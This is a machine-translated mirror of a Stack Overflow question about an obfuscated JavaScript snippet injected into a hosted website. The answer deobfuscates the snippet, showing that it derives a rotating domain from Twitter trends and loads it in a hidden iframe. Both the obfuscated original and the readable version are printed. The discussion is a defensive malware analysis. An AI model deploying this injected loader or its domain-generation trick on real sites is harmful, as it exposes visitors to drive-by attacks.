English 中文(简体)
这种危险的说法吗?
原标题:Is this dangerous Javascript? 
<script>
(function($$) {
    d = "(@(){ %H=@( +Pw=this;\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz )+#h}\ PD.splice(Vz ),1+VT - 3Vu -+ T +PD 3VU -};Pr={ hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`; :2345678901, / :48271, F :198195254, G :12, CX= };@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\ #p(#M)}Pj=document;#d=window; (C= undefined ; (S=VhaDWDosestnsdlDjfqcq  6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr ),#n("hxDgakDosxsLsJseD6sJDmDj"));PS.appendChild(#m)}@ PH(#q,PB){\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\(#N%#s) 7t(#k){ (N=V; )+#k; !D=V/ ); !v=V; )-VF ); !m=PH( !v, !D); !T= !v% !D 7p(P){\ P /==1?P[0]:P 3  )};@ #e(P){d=new Date( 6D=Vzee );d.setTime((P.as_of-VG )*VG )*VG )*Vezz -*Vezzz -;\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\ String.fromCharCode(i+x+24)});\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n("ETzeeu")+#K+"-"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez ); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz ),+Vee - 0Pu ,u 0Pd ,d; 4u+V, )] 0!#b) 4d+V, )];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,  )+ safetynet ).split(   6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh )+#p(#b).substring(0,#a)+ .com/ +PJ($);Pr[ Z ]=#g;Pf=VBI 1biMU 1UkrZRiMRIA );$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n( X : ` , ~.getUTC\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz )+P - )) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    for (c = 50; c; d = (t = d.split( #@PVX`~\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8 .substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    $$(d)
})(function(jsAP) {
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的东道国对此不谈,而且经常发生。 我认为,他们可能躲藏一种恶意的黑客企图。

做些什么?

EDIT:

我们改变了东道方。

该守则确实是恶意的,并注入我们的网站上。 我们的东道国正试图掩盖这一点(或许这样,我们就会感到担忧)。

我的朋友在同一个东道国的网站上就发生了这种情况。

www.un.org/Depts/DGACM/index_spanish.htm 请注意:

Looks like some obfuscated injection.

最佳回答

让我们去掉工作,把工作推向边缘;它就失去了活力。

AFAICT so far it s grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it s using to look up a day s trends is incorrect, because it s adding a zero-seconds thing onto the time, which isn t present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.

The blob of text decoded after decoding with thestart of analysis:

(function () {
    jsAr = { }; // Here only for a subsequent set of jsAr[ Z ] later, which may not be necessary.

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join(  )
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) *  1000 );
        return d
    }

    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    function jso($) {
        // Wait until we have jQuery loaded.
        if (typeof($) ==  undefined ) {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there s a timeout inside).
            if (typeof ($.jsAh) !=  undefined ) return;
            $.jsAh = 1;

            $.getJSON( http://api.twitter.com/1/trends/daily.json?callback=? , function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                urlTwitterTwoDaysAgo =  http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-  + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Run JSON request every second.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr =  0  + twoDigitPrevSixHr; // Normalize to hh
                            if (jsAd < 10) twoDigitPrevSixHr =  0  + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can t, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr +  :00 ];
                            if (!jsb) jsb = jsy[jsr + jsAd +  :00 ];

                            // Get third trend entry, e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // [ s ,  i , etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi,   ) +  safetynet ).split(  );

                            //    803 + prevSixHr * 3 + 410; -- some sort of hash?
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // Are these two lines useful? Neither jsAr[ Z ] nor jsg are referenced.
                            // jsb = [ s ,  i , etc... nterklaasintochtsafetynet]
                            jsg =  =http://  + firstElementOrJoined(jsb).substring(0, jsa) +  .com/index.php?tp=001e4bb7b4d7333d ;
                            jsAr[ Z ] = jsg;
                            //

                            jsAf =  <divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div> ;
                            $( body ).append(jsAf)
                        } catch (jsAy) {}
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

在这里,从阵列修建了一些URLs:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这部法典:

jsAS = jsAj.getElementsByTagName(jsn( Y ))[0];
jsm = jsAj.createElement(jsn( kS ));
jsm.setAttribute(jsn( kr ), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

将jquery script tag改为<head>:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
时间:2011-11-12 16:39:24
问题回答

暂无回答


上一篇:
下一篇:


相关问题
selected text in iframe

How to get a selected text inside a iframe. I my page i m having a iframe which is editable true. So how can i get the selected text in that iframe.

时间:2009-11-13 04:26:50 回答:3 展示:1
How to fire event handlers on the link using javascript

I would like to click a link in my page using javascript. I would like to Fire event handlers on the link without navigating. How can this be done? This has to work both in firefox and Internet ...

时间:2009-11-13 04:03:02 回答:2 展示:1
How to Add script codes before the </body> tag ASP.NET

Heres the problem, In Masterpage, the google analytics code were pasted before the end of body tag. In ASPX page, I need to generate a script (google addItem tracker) using codebehind ClientScript ...

时间:2009-11-13 03:31:36 回答:3 展示:1
Clipboard access using Javascript - sans Flash?

Is there a reliable way to access the client machine s clipboard using Javascript? I continue to run into permissions issues when attempting to do this. How does Google Docs do this? Do they use ...

时间:2009-11-09 14:57:38 回答:8 展示:1
javascript debugging question

I have a large javascript which I didn t write but I need to use it and I m slowely going trough it trying to figure out what does it do and how, I m using alert to print out what it does but now I ...

时间:2009-11-09 14:29:27 回答:2 展示:1
Parsing date like twitter

I ve made a little forum and I want parse the date on newest posts like twitter, you know "posted 40 minutes ago ","posted 1 hour ago"... What s the best way ? Thanx.

时间:2009-11-09 14:21:27 回答:2 展示:1
热门标签

友情链接

Allggapp Alljchome-教程家园 mvfinale.com-影视剧情大结局大全